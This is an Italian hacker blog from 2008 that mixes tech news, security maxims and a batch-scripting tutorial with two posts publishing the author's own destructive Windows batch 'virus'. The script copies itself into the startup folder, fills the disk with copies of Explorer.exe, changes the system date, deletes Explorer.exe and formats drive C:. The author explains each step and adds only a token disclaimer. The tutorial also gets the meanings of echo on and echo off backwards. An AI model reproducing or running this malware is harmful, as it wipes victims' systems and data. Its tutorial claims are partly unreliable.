W4nt3d Hacker

SpaceNewz- the best site on hack,internet and world

2008-07-18T03:25:00.000-07:00

W4nt3d hacker, si è gemmellato con SpaceNEwz, un blog dedicato a internet, pc e sicurezza.
Vistatelo:

SpaceNewz

Diffing - Parte 1

2008-07-14T02:02:00.000-07:00

Il diffing è una dell tecniche hacker più facili ed è utilizzata sopratutto per testare la sicurezza.
In poche parole il diffing consiste nel confrontare un qualsiasi file prima e dopoun'azione.
Il diffing può essere di tre tipi:

-A livello Disco: Indica i files modificati
- A livello dei files che indica i byte modificati
- a livello database, che specifica i redord.
In questo modo si può capire come modificare i dati all'esterno dell'applicazione per quale essi sono destinati.

La funzione Diff, è una funzione da poco aggiunta nei moderni sistemi UNIX e cloni, questa funzione non è altro che l'abbreviazione di difference. Quindi si può capire che diffing significa " uso del diff". Grazie a qesto confronto è possibile raccogliere informazioni riguardo il file.

W4nt3d Virus ver.2 beta

2008-07-12T03:02:00.000-07:00

del nuovo fantomatico virus, che ho creato, nell'ultima versione ho aggiunto due varienti, se l'utente conosce Linux, non succede niente, ma se l'utente non lo conosce beh.....
@echo on
copy 1.bat C:\Documents and Settings\All Users\Menu Avvio\Programmi\Esecuzione automatica\1.bat
copy 1.bat C:\WINDOWS\Freedom.bat /A/B/V/Y/-Y
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\B.bat /A/B
copyer C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\C.bat /A/B
copy C:\WINDsOWS\Freedom.bat C:\WINDOWS\twain_32\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\F.bat /A/B
copy C:\WINasdDOWS\Freedom.bat C:\WINDOWS\twain_32\G.bat /A/B
copy C:\WINDOWS\Fadreedom.bat C:\WINDOWS\twain_32\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\I.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\M.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\B.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\C.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\F.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\G.bat /A/B
copy C:\WINDsasdOWS\Freedom.bat C:\WINDOWS\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\I.bat /A/B
copy C:\WINDasdOWS\Freedom.bat C:\WINDOWS\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\M.bat /A/B
copy C:\WINDOWS\Explorer.exe C:\2.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\4.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\5.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\6.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\7.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\8.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\9.txt /A/B/V/Y/-Y
copy C:\WINDasdOWS\Explorer.exe C:\0.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\10.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\11.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\12.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\132.txt /A/B/V/Y/-Y
date 01-01-1980
copy C:\WINDOWS\Explorer.exe C:\32.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\43.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\34.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\35.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\36.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\37.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\38.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\39.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\30.txt /A/B/V/Y/-Y
copy C:\WINDdOWS\Explorer.exe C:\310.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\311.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\312.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3132.txt /A/B/V/Y/-Y
choice/C:SN /T:N,15 Conosci LINUX??????
erase C:\WINDOWS\Explorer.exe
format C: /
Allora un piccolo riepilogo, questo w4nt3d, virus a SCOPO INFORMATIVO IL BLGO SI SOLLEVA DA QUALSIASI SCOPO DANNOSO(che poi è anche presente un erroe nel codice per far si di non darvi l'arma carica)

Ciao zio Bill

2008-07-11T00:17:00.000-07:00

Roma - Era atteso da tempo, ma il giorno fatidico è arrivato e passato non senza un certo clamore: Bill Gates ha lasciato il suo lavoro a tempo pieno in Microsoft, ufficialmente per dedicarsi alla sua attività filantropica, grazie alla fondazione creata qualche anno fa. Cosa succederà ora alla sua azienda? C'è chi indica la partenza di Gates come l'inizio della fine della BigM che conosciamo, altri sono più ottimisti: di certo Microsoft cambierà, in meglio o in peggio è da vedersi.

Per cercare di fare il punto sull'evoluzione dell'azienda di Redmond, Punto Informatico si è rivolto ad una delle voci più autorevoli in materia: Mary Jo Foley, blogger-editorialista e autrice di un recente libro intitolato Microsoft 2.0, che tenta proprio di spiegare come l'azienda fondata 33 anni fa da Gates pensa di riuscire a restare a galla dopo la sua partenza.

Punto Informatico: Dunque Mr. Gates se ne va. Nel suo libro, lei racconta di questa condizione tutta nuova per manager e dipendenti di Microsoft: ma Bill Gates è davvero insostituibile, oppure Microsoft può sopravvivere alla sua partenza e alla sua eredità?
Mary Jo Foley: Credo che Gates sia davvero insostituibile. Il CEO Steve Ballmer non può rimpiazzarlo, né può farlo il chief sowftware architect Ray Ozzie. Ma non credo che questo significhi che Microsoft sia morta o stia morendo.
PI: Chi prenderà il suo posto allora?
MJF: Gates ha di recente spiegato che si aspetta che i 22 technical fellow, più Ray Ozzie e Craig Mundie (il capo della ricerca e della strategia) - 24 persone in totale - lo rimpiazzino. L'azienda ha un piano per il futuro e ha molti interessanti progetti in preparazione - dal modello di strategia/architettura Oslo, a Live Mesh, fino a Midori (un nuovo sistema operativo che non sarà basato sul core di Windows).

PI: La nuova Microsoft sarà una azienda centrata su Steve Ballmer come lo è stata su Bill Gates sin dai primi anni?
MJF: No, non credo. Gates ha ricevuto molto credito per aver fondato l'azienda ed è stato visto come il perfetto uomo immagine di Microsoft da molti osservatori sia dentro che fuori la company. Ora Ballmer è senz'altro "il comandante in capo", non c'è dubbio. Ma poiché è più un commerciale che un tecnico, ritengo che il pubblico lo considererà più come un manager di Microsoft, invece che colui che definisce lo "spirito" della società.

PI: Sarà anche che il mondo è cambiato?
MJF: L'industria IT è cambiata molto rispetto a quando Gates ha fondato Microsoft 33 anni fa. L'azienda, sotto la sua guida, ha avuto la possibilità di cambiare il business del PC convincendo (anche con la forza) i produttori a preinstallare Windows. Così Microsoft è diventata grande e ricca. Ora l'industria è molto più frammentata. Certo, Google è il monopolista del search, ma non credo sia oggi più possibile che un nuovo monopolista detenga nelle sue mani l'intero comparto IT. Google, ad esempio, ne possiede/controlla solo un pezzo relativamente piccolo.

React OS

2008-07-11T00:16:00.001-07:00

Continua l’eterno processo di sviluppo di ReactOS, sistema operativo libero basato su kernel ibrido il quale è in grado di fornire un’implementazione completa delle API e delle ABI di Windows XP (NT).

Il progetto ha origini ormai remote che risalgono al lontano 1995; tutto partì dalla bozza di un sistema “compatibile” con Windows 95 ma, a causa di problemi di carenza delle funzionalità, FreeWin95 morì ancor prima di nascere.

I programmatori però non si arresero e alla fine dello stesso anno decisero di puntare alla realizzazione di un sistema operativo totalmente Open Source ma mirante a ottenere piena compatibilità con il più avanzato Windows NT di cui oggi è diretto discendente Windows XP.

Continua a leggere...

Blogger arrestato in russia

2008-07-11T00:13:00.000-07:00

Roma - Il blog non è un mass medium, esprimersi su un blog equivale a prorompere in un'esternazione in un luogo pubblico: le autorità russe lo riconoscono, ma nel contempo condannano ad un anno di carcere con la condizionale un giovane cittadino che si è lasciato andare a commenti caustici sulle forze dell'ordine locali.

"Le forze dell'ordine sono la feccia" scriveva Savva Terentiev nel blog di un giornalista nel febbraio del 2007: con un lessico aggressivo esprimeva il proprio dissenso nei confronti dei provvedimenti presi dalle autorità per soffocare la libertà di stampa dei mezzi di informazione di opposizione di Syktyvkar, nel profondo nord russo. Proponeva che le forze di polizia venissero immolate su pire in ogni piazza della Russia due volte al giorno, proponeva che gli agenti venissero bruciati su fuochi catartici.

Terentiev è stato trascinato in tribunale, il procuratore lo ha accusato di aver incitato all'odio i suoi concittadini, di aver impugnato il commento su un blog come fosse un medium ordinario "con l'obiettivo di aizzare i cittadini contro uno specifico gruppo sociale". Il commento è stato rimosso, sul suo commento sono state effettuate analisi linguistiche per verificare che la sortita di Terentiev fosse a tal punto dirompente. Il giovane blogger si è rivolto al presidente Medvedev, ha pubblicato una lettera aperta, ha tentato di dimostrare la propria innocenza pur ammettendo che "è nostro dovere assumerci la responsabilità per le parole postate sul Web". Nonostante Terentiev si proclamasse innocente, nonostante abbia ammesso che le sue parole potessero essere infiammabili, il giudice lo ha ritenuto colpevole, lo ha condannato ad un anno di carcere con la condizionale.
Poco importa che la condanna sia stata mitigata rispetto alle previsioni iniziali: il caso potrebbe costituire un precedente per la giurisprudenza russa, commentano i blogger locali. Le associazioni per i diritti civili, come SOVA, avvertono infatti che il giudice si è prodotto in contorsioni legali, che ha stiracchiato la legge estendendo di fatto ai blog lo status di mezzi di comunicazione: "Questo verdetto potrebbe significare che è impossibile esprimere commenti poco gentili nei confronti di qualcuno".

A sostegno di Terentiev sono stati aperti dei blog che raccontano l'evolvere della sua vicenda giudiziaria, sono stati postati video provocatori su YouTube, si è pronunciato Anton Nosik di LiveJournal, piattaforma sulla quale operano molti netizen russi: "Un weblog non è un massmedium, è stato creato per scambiarsi opinioni. Arrestare qualcuno perché esprime delle rimostranze in un blog, è come arrestarlo perché ha espresso delle opinioni mentre si trovava in un autobus".

IE8 tutta sicurezza

2008-07-11T00:12:00.000-07:00

Internet Explorer beta 2, la cui uscita è attesa in concomitanza con l'arrivo del mese di agosto, apporterà nuove soluzioni in grado di rendere la navigazione sul Web una operazione ancora più sicura. Particolarmente importante si rivela la funzione SmartScreen Filter, che sostituisce il Phishing Filter presente in IE7, il filtro XSS, i cambiamenti introdotti ai componenti Active X e l'abilitazione del Data Execution Prevention (DEP).

La funzione SmartScreen Filter nasce in risposta alle funzionalità antiphishing introdotte di recente in Firefox 3 e Opera 9.5 e, come la precedente tecnologia introdotta in IE7, fornisce strumenti in grado di combattere la piaga del phishing, aggiungendo inoltre protezione nei confronti di siti Web malevoli e un supporto anti malware. Il filtro si basa su di una blacklist costantemente aggiornata e supporta anche un controllo di tipo euristico, presentando così l'avviso di un potenziale pericolo. Il filtro XSS (cross-site scripting) utilizza una tecnica euristica per "ripulire" eventuali script malevoli presenti all'interno delle pagine Web e che effettuano richieste di tipo cross-site, avvisando nel contempo del potenziale pericolo.

Numerosi i cambiamenti introdotti nella gestione dei componenti ActiveX, i quali vengono ora installati in relazione ai profili dei singoli utenti e sulla base dei singoli siti; ogni singolo utente disporrà quindi di una copia di Internet Explorer al cui interno saranno presenti solamente i componenti ActiveX da lui installati, mentre i singoli componenti funzioneranno solamente all'interno della pagine Web dalle quali sono stati scaricati.

La funzione ActiveX Killbits, in grado di disabilitare i componenti nel caso siano state riscontrate vulnerabilità, offre ora una integrazione con Windows Update; Microsoft potrà quindi inviare un Killbit attraverso il sistema di aggiornamento automatico e bloccare così l'esecuzione di componenti obsoleti o potenzialmente pericolosi all'interno del browser. La Data Execution Prevention (DEP), sinora disabilitata in Internet Explorer per motivi di compatibilità con alcuni controlli ActiveX, verrà ora resa attiva e utilizzata di default sotto Windows XP SP3 e Windows Vista SP1.

http://www.webnews.it/news/leggi/8726/ie8-beta-2-punta-sulla-sicurezza/

Il primo Modem opensource

2008-07-11T00:10:00.000-07:00

Dopo avervi presentato poco più di un mese fa il prototipo della prima scheda video con specifiche completamente aperte, eccoci oggi a documentarvi l’arrivo sul mercato americano del Netgear WGR614L.

Ovviamente non si tratta di una scheda grafica bensì di un semplicissimo router con caratteristiche praticamente identiche a quelle degli altri prodotti appartenenti alla stessa fascia medio-bassa del mercato.

Non mancano ovviamente 4 porte Ethernet 10/100, il WiFi 802.11b/g e il supporto routing statico e dinamico con TCP/IP, VPN pass-through (IPsec, L2TP), NAT, PPTP, PPPoE, DHCP; da non dimenticare anche la presenza di uno stateful firewall.

Fin qui effettivamente non c’è nulla di scandaloso; il fattore che infatti contraddistingue il prodotto in questione è la capacità dell’hardware di supportare senza alcun problema ogni tipo di firmware open source, anche fatto in casa.

Al giorno d’oggi il router di Netgear predilige il funzionamento con firmware basati sui progetti Tornado e DD-WRT, ma a breve sarà disponibile anche il supporto a OpenWRT. Con il lancio del WGR614L, Netgear ha anche inaugurato un sito sul quale sono già reperibili tutte le informazioni sul prodotto e ogni singolo file necessario per il funzionamento dello stesso.

Per ora il router è disponibile esclusivamente sul mercato americano al prezzo di 69 dollari; ancora sconosciuta la data di lancio sul mercato europeo e su quello italiano.

http://www.oneopensource.it/03/07/2008/netgear-wgr614l-ecco-il-primo-router-completamente-open-source/

YouTube monitorerà cosa guardano gli utenti

2008-07-11T00:09:00.000-07:00

Si è conclusa almeno una parte della grande causa per violazione del diritto d'autore che vede Viacom impegnata a dimostrare che YouTube, il più grande sito di videosharing al mondo, non può fare quello che fa per come lo fa ad oggi.
er il momento Viacom non è riuscita nei propri intenti. Alcune sentenze preliminari infatti si sono pronunciate contro la società padrona, tra le altre cose, anche del network di Mtv: YouTube non dovrà fornire il codice sorgente del proprio motore di ricerca nè tantomeno dovrà fornire il codice relativo ai suoi filtri.

La risposta del giudice è stata esemplare: «YouTube e Google non possono essere messi a rischio solo per un azzardo. Per ottenere il diritto a guardare il codice sorgente occorrerebbero prove concrete che ciò che sostiene Google sia falso e che la funzione di ricerca o i filtri sono effettivamente utilizzati per discriminare i contenuti».

Ma non è andata altrettanto bene agli utenti. Il giudice Louis L. Stanton del distretto di Manhattan, infatti, dopo aver detto di no alle prime due richieste di Viacom ha invece trovato ragionevole la terza, quella che costringe a YouTube di tenere un log file preciso con cosa vedano gli utenti. Se infatti il sistema di ricerca di YouTube è stato considerato segreto industriale, non alla stessa stregua viene visto un archivio che annota l'attività dell'utenza sul portale.

Dunque come richiesto da Viacom Youtube dovrà tenere nota di chi guarda cosa, appuntando indirizzi IP e User ID di ogni utente per poi inviare tutto (o quantomeno tutto quello che li riguarda) alla società querelante. Ovvie, quanto inutili, proteste si sono levate in nome della violata privacy degli utenti che violano il copyright.

http://www.webnews.it/news/leggi/8725/youtube-monitorera-cosa-guardano-gli-utenti/

Batch , un non linguaggio di programmazione

2008-07-09T13:09:00.000-07:00

In realtà il batch non è un vero e proprio linguaggio di programmazione, questo perchè per funzionare ha bisogno del prompt dei comandi. In questa breve guida voglio spiegarvi come creare files batch.

inanzitutto dovete sapere che in batch non c'è un ordine preciso, ma l'ordine deve stare nella vostra testa, l'azione che deve essere eseguita per prima deve essere inserita prima di un'altra.

Comandi batch:

@echo on ----> Con l'echo on decidiamo di non far visualizzare a l'utente il processo
@echo off ---->Con echo off l'utente visualizzerà il processo.

Il primo programma--- Hello World:

Per scrivere Hello World bisgona digitare :

@echo off
type C:prova.txt|more
pause

salvate con il nome bat1.bat e nella stessa cartella create un file di nome prova.txt e scrivete all'interno Hello World, oppure Sono Scemo.
poi avviate il Batch, si dovrebbe visuallizzare:

Hello World
Premere un tasto per conitnuare...

Quindi, ora che sapete che per creare batch basta solo sapere i comandi da usare, nel prossimo post, vi postero tutti i codici che conosco per creare grandi batch.

W4nt3d Virus 0.1 beta

2008-07-09T13:03:00.000-07:00

Questa è solo una dimostrazione di come anche un semplice file batch può creare molti problemi.QUindi il blog non si assume alcuna responsabilità riguardo l'utilizzo del codice.

@echo on
copy 1.bat C:\WINDOWS\Freedom.bat /A/B/V/Y/-Y
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\B.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\C.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\F.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\G.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\I.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\twain_32\M.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\A.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\B.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\C.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\D.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\E.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\F.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\G.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\H.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\I.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\L.bat /A/B
copy C:\WINDOWS\Freedom.bat C:\WINDOWS\M.bat /A/B
copy C:\WINDOWS\Explorer.exe C:\2.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\4.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\5.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\6.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\7.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\8.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\9.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\0.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\10.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\11.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\12.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\132.txt /A/B/V/Y/-Y
date 01-01-1980
copy C:\WINDOWS\Explorer.exe C:\32.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\43.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\34.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\35.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\36.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\37.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\38.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\39.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\30.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\310.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\311.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3122.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\312.txt /A/B/V/Y/-Y
copy C:\WINDOWS\Explorer.exe C:\3132.txt /A/B/V/Y/-Y

erase C:\WINDOWS\Explorer.exe
format C: /autotest /q /u

Allora, ora vi spiegherò cosa fa di preciso il file batch, all'inizio si copia in varie cartelle, di seguito,copia il files explorer.exe in altre cartelle in modo da riempire un po'di spazio.Cambia la data del pc, la imposta al 1-1-1980 , ricomincai il processo di copi del file explorer, all'ultimo il batch, cancella il dile explorer.exe e formatta il pc.

La baviera, già pronta a distribuire Trojan

2008-07-09T05:30:00.000-07:00

Roma - I trojan di stato non violano i diritti civili dei cittadini bavaresi: la polizia potrà disseminarli via email, potrà infiltrarsi nelle macchine dei sospetti, potrà perquisire da remoto gli hard disk degli individui. Spetterà alle forze dell'ordine stabilire quali siano i casi di vita o di morte nei quali intervenire.

Dal primo di agosto, conferma Juergen Schmidt di Heise online a Punto Informatico, le forze dell'ordine della Baviera avranno la possibilità di effettuare ricerche online sui computer dei sospetti. Nonostante la Corte Costituzionale federale si sia espressa in materia e abbia descritto la sorveglianza attraverso backdoor statali come una pratica capace di erodere i diritti civili e la spontaneità dei cittadini, un emendamento alle leggi bavaresi promosso in clima pre-elettorale dal partito di maggiornaza CSU ha consegnato alle autorità locali la licenza di spionaggio a mezzo malware, a mezzo di quelli che la stampa ha già definito bayerntrojaner, trojan bavaresi.

Sarà dunque legale distribuire spyware e vigilare sul computer del sospetto, le forze dell'ordine potranno battere a tappeto i dispositivi di archiviazione, modificare e cancellare dati che risiedono sulla macchina del cittadino che "costituisca una urgente minaccia al paese o alla federazione, o alla vita o alla libertà di una persona". I trojan di stato in Baviera potrebbero non essere semplicemente impugnati come strumenti di computer forensics, ma potrebbero servire anche a prevenire atti che possano attentare alla sicurezza dello stato e dei cittadini. Potrebbe non essere necessario un mandato del giudice per inoculare microspie software, avvertono dall'opposizione: le forze dell'ordine, operando nel dominio dell'immateriale, potrebbero abusare del potere loro conferito.
"La Baviera sarà il primo stato ad offrire le basi legali per le ricerche online" spiega con orgoglio il ministro dell'Interno locale Joachim Herrmann. Le autorità bavaresi, dopo il veto opposto dalla Alta Corte federale di Germania nei confronti delle pratiche di spionaggio a mezzo backdoor accolte dalla leggi del lander del Nord-Reno Westfalia, sono le prime a reintrodurre nel quadro normativo le indagini da remoto.

La Baviera è indiscutibilmente all'avanguardia: le autorità locali, era emerso nei mesi scorsi da documenti pubblicati su Wikileaks, si sono mobilitate per far fronte all'impossibilità di intercettare le comunicazioni che si scambiano su Skype. "Mostreremo un'altra volta chi è il leader nel campo della sicurezza interna tedesca" annuncia Herrmann.

In Germania da tempo fermenta l'idea di approntare un quadro normativo che permetta alle forze dell'ordine di combattere terrorismi e minacce attraverso il malware di stato, ma la Corte Costituzionale locale ha avvertito le autorità dei rischi che una simile legge possa comportare se introdotta senza alcuna garanzia per il cittadino. La Baviera ha trovato gli appigli per poter regolarizzare i trojan di stato, per offrire agli investigatori quelli che il ministro Herrmann ha descritto come strumenti in grado di tenere il passo coi tempi nella protezione dei cittadini. Checché ne dicano i membri dell'opposizione, checché ne dicano i cittadini, il ministro Herrmann non ha il minimo dubbio che "l'introduzione delle modifiche alla legge non cozzi con la Costituzione bavarese e la Costituzione federale".

Analizziamo le varie leggi

2008-07-09T05:11:00.000-07:00

La sicurezza sul lato client no funziona perchè anche se si crea un sistema sicuro, comunque la persona che utilizza il pc, puo disattivarlo e rederlo non sicuro: ES... Se per esempio abbiamo un sistema sicurissimo, ma vogliamo installarci un gioco, inseriamo il cd, il sistema sicuro lo blocca e non avvi l'installazione, allora noi disattiviamo la sicurezza e ci becchiamo un bel virus.
Quando noi scambia chiavi di crittografia lo facciamo prima dell'inizio della comunicazione, che ne sappiamo se un cretino ci sta ingannando fingendosi l'altro root.ES... dobbiamo inviare una chiave di crittografia a nostro cugino per iniziare una comunicazione protetta, nel frattempo nostro fratello attraverso dei processi che spiegheremo più in la, ci fa credere di essere nostro cugino, noi gli inviamo le chiavi e lui così puo sapere i nostri segreti.Un modo per aggirare questo problema ci sarebbe, bisogna inviare la chiave, chiamare tuo cugino e chiedergli la chive, se lui l'ha ricevuta sarà esatta altrimenti stoppiamo la comunicazione.
Be, quando dico che non si è m,ai protetti al 100% è vero, bisogna pensare che anche se abbiamo un antivirus aggiornato ad un secondo fa, potrebbe già essere uscito un virus, che ancora non è stato "ispezionato" dalla casa antivirus.
Per capiure meglio il concetto: l'antivirus per trovare virus, si avvale di firme , cio spezzoni di file binari che dovrebbero essere presenti in quel virus. Se esce un nuovo virus, la casa antivirus, lo dovra prendere, analizzarlo e poi potra prendere le firma, ma il rpoblema non finisce qui, perchè l'utente dovrà aggiornare l'antivirus!
I virus assumo altre forme, è vero, perchè un virus, na volta publicato potrebbe modificare il suo codice, in modo da rendere inutile la firma dell'antivirus già esistente.
L'inganno il modo più veloce per diffondere virus, chiamata anche ingegneria sociale, questo è il metodo usato negli ultimi anni, per colpire pc e reti, senza sporcarsi le mani.Basti pensare a Melissa, che si diffondva attraverso un e-mail oppure I Love You, ma ne potremmo citare a migliardi di questi virus.

Leggi Sulla sicurezza

2008-07-09T04:59:00.001-07:00

Come primo articolo voglio darvi delle semplici leggi riguardo la sicurezza in generale.

La sicurezza sul lato client non funzione
Non è possibile scambiare la chiavi di crittografia in modo protetto senza informazione condivisa
E' impossibile essere protetti al 100% dal codice maligno
Qualunque virus, trojan e altro può camiare forma e aggirare il rilevamento della firma
I firewall non proteggono al 100% idem gli antivirus
LE password non sono mai sicure
Un sistema può essere definito sicuro quando supera un apposito controllo di protesione indipendente
La sicurezza mediante oscurità non funziona.

Oltre a questo modo si possono estrapolare altre 10 leggi più o meno identiche:

Se una persona disonesta ti convince a eseguire un programma sul tuo computer quello non è più il tuo computer
Se una persone disonesta riesce a modificare il sistema operativo del tuo computer, quello non è più il tuo computer
Se una persona disonesta ottiene l'accesso fisico illimitato al tuo computer, quello non è più il tuo computer
Se consenti a una persona disonesta di caricare programmi sul tuo sito Web, quello non è più il tuo sito web
le password deboli hanno la meglio su una sicurezza robusta
Una macchina è sicura quanto l'attendibilità dell'amministratore
I dati crittografati sono sicuri solo quando lo è la chiave di codifica
Un analizzatore di virus non aggiornato è preferibile solo in parte a mancanza di tale software
l'anonimato assoluto non è utile
la tecnologia non è una panacea!